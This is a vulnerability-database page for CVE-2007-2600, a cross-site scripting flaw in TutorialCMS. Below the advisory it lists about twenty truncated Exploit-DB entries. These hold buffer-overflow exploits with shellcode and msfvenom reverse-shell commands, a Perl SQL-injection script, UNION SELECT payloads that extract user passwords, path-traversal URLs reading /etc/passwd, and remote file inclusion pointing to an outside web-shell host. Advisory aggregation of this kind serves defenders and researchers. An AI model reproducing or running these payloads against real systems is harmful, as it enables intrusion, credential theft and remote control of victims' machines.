CVE-2007-2600
published 2007-05-11CVE-2007-2600: Multiple cross-site scripting (XSS) vulnerabilities in TutorialCMS (aka Photoshop Tutorials) 1.00 and earlier allow remote attackers to inject arbitrary web…
PriorityP426medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.78%
84.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in TutorialCMS (aka Photoshop Tutorials) 1.00 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) catFile parameter to (a) browseCat.php or (b) browseSubCat.php; the (2) id parameter to (c) openTutorial.php, (d) topFrame.php, or (e) admin/editListing.php; or the (3) search parameter to search.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wavelink_media | tutorialcms | <= 1.00 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb·2025-06-15·CVSS 6.9
CVE-2025-4255 [MEDIUM] PCMan FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb·2012-06-14
CVE-2007-1195 XM Easy Personal FTP Server 5.30 - Remote Format String Write4
XM Easy Personal FTP Server 5.30 - Remote Format String Write4
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb·2009-09-03
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
SIDVault 2.0e - Windows Remote Buffer Overflow
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb·2008-05-23·CVSS 7.5
CVE-2008-1881 [HIGH] VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our firends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB
neuron news 1.0 - 'index.php?q' Local File Inclusion
exploitdb·2007-09-21
CVE-2007-5050 neuron news 1.0 - 'index.php?q' Local File Inclusion
neuron news 1.0 - 'index.php?q' Local File Inclusion
---
\\\|///
\\ - - // Y! Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Neuron News 1.0
Download : http://downloads.localhost.be/scripts/neuronnews.zip
Author : Dj7xpl
HomePage : http://r00t.ir / http://Dj7xpl.2600.ir
Type : Local File Inclusion
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln :
http://[TARGET]/[PATH]/index.php?q=[Local File]%00
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-09-21]
Exploit-DB
Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)
exploitdb·2007-08-29
CVE-2007-3034 Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)
Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)
---
/*
* MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
* by Hong Gil-Dong & Chun Woo-Chi
* Yang yeon(?~1542), Korea
* "I shall keep clenching my left fist unitl i see the real tao".
* This POC is only for test. If an application read a malformed wmf
* file like this POC, the application will be crashed. If you apply
* this code, you can execute an arbitrary code.
*
* We tested this code on Windows XP SP2 Korean Edition
* (GDI32.dll version 5.1.2600.3099). But it will work well on other
* systems.
*/
#include
#include
#define WMF_FILE "ms07-046.wmf"
void usage(void);
int main()
{
FILE *fp;
char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
"\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB
Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb·2007-05-19
CVE-2007-2783 Rational Software Hidden Administrator 1.7 - Authentication Bypass
Rational Software Hidden Administrator 1.7 - Authentication Bypass
---
####################################################################################
# Hidden Administrator Authenticaiton Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB
PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion
exploitdb·2007-05-12
CVE-2007-2665 PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion
PHP FirstPost 0.1 - 'block.php?Include' Remote File Inclusion
---
..:: PhpFirstPost blog Remote File Include Exploit ::..
/*
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : PhpFirstPost 0.1
[!] Download : http://sourceforge.net/projects/phpfirstpost/
[!] Type : Remote File Include Exploit
*/
var path="/"
var adress="block.php?"
var include ="Include="
var phpshell="http://dj7xpl.by.ru/shell/c99.php?"
function command(){
if (document.rfi.target1.value==""){
alert("Exploit Failed...");
return false;
}
rfi.action= document.rfi.target1.value+path+adress+include
Exploit-DB
R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion
exploitdb·2007-05-11
CVE-2007-2642 R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion
R2K Gallery 1.7 - 'galeria.php?lang2' Local File Inclusion
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln
Bug :
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
Example :
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
# milw0rm.com [2007-05-11]
Exploit-DB
maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
exploitdb·2007-05-11
CVE-2007-2643 maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]
Bug :
http://[Target]/[Path]/phpT
Exploit-DB
TutorialCMS 1.00 - 'search.php?search' SQL Injection
exploitdb·2007-05-09
CVE-2007-2600 TutorialCMS 1.00 - 'search.php?search' SQL Injection
TutorialCMS 1.00 - 'search.php?search' SQL Injection
---
#!/usr/bin/perl -w
#################################################################################
# #
# TutorialCMS alert('http://www.w4ck1ng.com') #
# #
# PoC: http://victim.com/search.php?search=' UNION SELECT 0,0,0,0,username, #
# password,0,0,0,0,0,0,0 FROM users WHERE id='1' /* #
# #
# Subject To: magic_quotes_gpc set to off #
# GoogleDork: "Powered By Photoshop Tutorials" (0 Results) #
# #
# Shoutz: The entire w4ck1ng community #
# #
#################################################################################
use LWP::UserAgent;
if (@ARGV new() or die "Could not initialize browser\n";
$useragent->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$sql = $ARGV[0] . "search.php?search=' UNION SELECT 0,0,0,0
Exploit-DB
Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass
exploitdb·2007-05-05
CVE-2007-2574 Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass
Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : Archangel Weblog version 0.90.02
Home : http://www.archangelmgt.com/weblog.shtml
Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
Author : Dj7xpl / [email protected]
HomePage : http://Dj7xpl.2600.ir
Type : Local File Inclusion & Login Page Bypass By Cookie
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Local File Include :
http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00
+--------
Exploit-DB
PostNuke Module v4bJournal - SQL Injection
exploitdb·2007-05-02
CVE-2007-2492 PostNuke Module v4bJournal - SQL Injection
PostNuke Module v4bJournal - SQL Injection
---
PostNuke Journal
DISCOVERED BY :Ali Abbasi
Olom Fonon Mazandaran University - Security Research Center, Babol, Iran
Greetz For All Y! UnderGround Group Members ( www.2600.ir )
Greetz For All Persian Bugtraq Members ( www.bugtraq.ir )
Contact: [email protected]
{SQL BUG}
in
index.php?module=v4bJournal&func=journal_comment&id=(SQL)
EXPLIOT BY :ABDUCTER
Greetz For ABDUCTER Real Friend Nanos (Nancy)
Contact: [email protected]
index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_pass,3,4,pn_uname,6,7,8,9,10,11,12,13,14/**/from/**/nuke_users/**/where/**/pn_uid=2/*
EX:-
http://www.arsfoodcourt.com/index.php?module=v4bJournal&func=journal_comment&id=-1/**/union/**/select/**/0,pn_uname,pn_
Exploit-DB
PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
exploitdb·2007-05-02
CVE-2007-2486 PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
---
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
|* *|
|* Y! Underground Group *|
|* *|
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Portal.....: PStruh-CZ 1.3&1.5
Type.......: Remote File Disclosure Vulnerability
Author.....: Dj7xpl / [email protected]
HomePage...: http://Dj7xpl.2600.ir
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Bug........:
download.asp?File=[File
Exploit-DB
1024 CMS 0.7 - 'download.php' Remote File Disclosure
exploitdb·2007-05-02
CVE-2007-2507 1024 CMS 0.7 - 'download.php' Remote File Disclosure
1024 CMS 0.7 - 'download.php' Remote File Disclosure
---
\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
# milw0rm.com [2007-05-02]
Exploit-DB
Maran PHP Forum - 'forum_write.php' Remote Code Execution
exploitdb·2007-04-22
CVE-2007-2182 Maran PHP Forum - 'forum_write.php' Remote Code Execution
Maran PHP Forum - 'forum_write.php' Remote Code Execution
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Maran PHP Forum +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution +
+ Download....: http://www.maran.pamil-visions.com/maranforum.php +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Xpl.........: +
+ ---===Maran PHP Forum===------===Dj7xpl===--- +
+ +
+ +
+ +
+ " type="text" > +
+ +
+ +
+ +
+ Please change Target And Run This Script +
+ Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell +
+ E.g : http://site.com/forum/data/filename.php?cmd=ls -la +
+ +
+ +
+ +
+ +
+ +
# milw0rm.com [2007-04-22]
Exploit-DB
JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
exploitdb·2007-04-22
CVE-2007-2184 JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
JChit counter 1.0.0 - 'imgsrv.php?ac' Remote File Disclosure
---
Y! Underground Group
http://2600.ir
Portal.......: jchit counter v1.0.0
Download.....: http://developers.jccorp.net
Type.........: Remote File Disclosure Vulnerability
Author.......: Dj7xpl / [email protected]
HomePage.....: http://Dj7xpl.2600.ir
Bug..........:
imgsrv.php?acc=[Local File]%00
imgsrv.php?acc=../../../../../etc/passwd%00
imgsrv.php?acc=../config.php%00
# milw0rm.com [2007-04-22]
Exploit-DB
PHP-Ring Webring System 0.9 - SQL Injection
exploitdb·2007-04-22
CVE-2007-2183 PHP-Ring Webring System 0.9 - SQL Injection
PHP-Ring Webring System 0.9 - SQL Injection
---
Y! Underground Group
http://2600.ir
Portal.......: uPHP_ring_website
Download.....: http://www.undoweb.frih.net , http://undoweb.frih.net/downloads/uPHP_ring_website.zip
Type.........: Sql Injection Attack
Author.......: Dj7xpl / [email protected]
HomePage.....: http://Dj7xpl.2600.ir
Bug..........:
index.php?ring=Sql.Inject
index.php?ring=-1/**/UNION/**/SELECT/**/0,admin_uname,admin_pass/**/FROM/**/ring_admins/*
or
index.php?ring=-1/**/UNION/**/SELECT/**/0,USER_NAME,USER_PASS,1,2,3/**/FROM/**/ring_users/*
# milw0rm.com [2007-04-22]
Exploit-DB
Mozzers SubSystem final - 'subs.php' Remote Code Execution
exploitdb·2007-04-18
CVE-2007-2169 Mozzers SubSystem final - 'subs.php' Remote Code Execution
Mozzers SubSystem final - 'subs.php' Remote Code Execution
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Mozzers SubSystem v1.0 Final +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote Code Execution Vulnerability +
+ Download....: http://sourceforge.net/projects/subsystem/ +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: +
+ (1) Open Target By Browser : http://[Target]/[Path]/index.php?page=add +
+ (2) Insert Bad Code Into (Sub-name) Or (Sub-url) E.g : +
+ (3) See Your Bad Code : http://[Target]/[Path]/subs.php +
+ +
# milw0rm.com [2007-04-18]
Exploit-DB
jGallery 1.3 - 'index.php' Remote File Inclusion
exploitdb·2007-04-18
CVE-2007-2158 jGallery 1.3 - 'index.php' Remote File Inclusion
jGallery 1.3 - 'index.php' Remote File Inclusion
---
+ +
+ Y! Underground Team +
+ +
+ +
+ Portal......: jGallery 1.3 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote File Inclusion Vulnerability +
+ Dork........: intitle:"jGallery" +
+ Download....: http://portal.kooijman-design.nl/jGallery/README.html +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: http://[Target]/[Path]/index.php?G_JGALL[inc_path]=http://[EvilSite]/Evil.txt%00 +
+ +
# milw0rm.com [2007-04-18]
Exploit-DB
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
exploitdb·2007-04-18
CVE-2007-2157 Zomplog 3.8 - 'force_download.php' Remote File Disclosure
Zomplog 3.8 - 'force_download.php' Remote File Disclosure
---
+ +
+ Y! Underground Group +
+ +
+ +
+ Portal......: Zomplog v3.8 +
+ Author......: Dj7xpl / [email protected] +
+ Type........: Remote File Disclosure Vulnerability +
+ Download....: www.zomp.nl/zomplog +
+ Page........: http://Dj7xpl.2600.ir +
+ +
+ +
+ Bug.........: http://[Target]/[Path]/upload/force_download.php?file=[Local Path] +
+ E.g.........: http://[Target]/[Path]/upload/force_download.php?file=../../../etc/passwd +
+ +
# milw0rm.com [2007-04-18]
No writeups or analysis indexed.
http://osvdb.org/35892http://osvdb.org/35893http://osvdb.org/35894http://osvdb.org/35895http://osvdb.org/35896http://osvdb.org/35897http://www.securityfocus.com/bid/23905http://www.vupen.com/english/advisories/2007/1742https://exchange.xforce.ibmcloud.com/vulnerabilities/34215https://www.exploit-db.com/exploits/3887http://osvdb.org/35892http://osvdb.org/35893http://osvdb.org/35894http://osvdb.org/35895http://osvdb.org/35896http://osvdb.org/35897http://www.securityfocus.com/bid/23905http://www.vupen.com/english/advisories/2007/1742https://exchange.xforce.ibmcloud.com/vulnerabilities/34215https://www.exploit-db.com/exploits/3887
2007-05-11
Published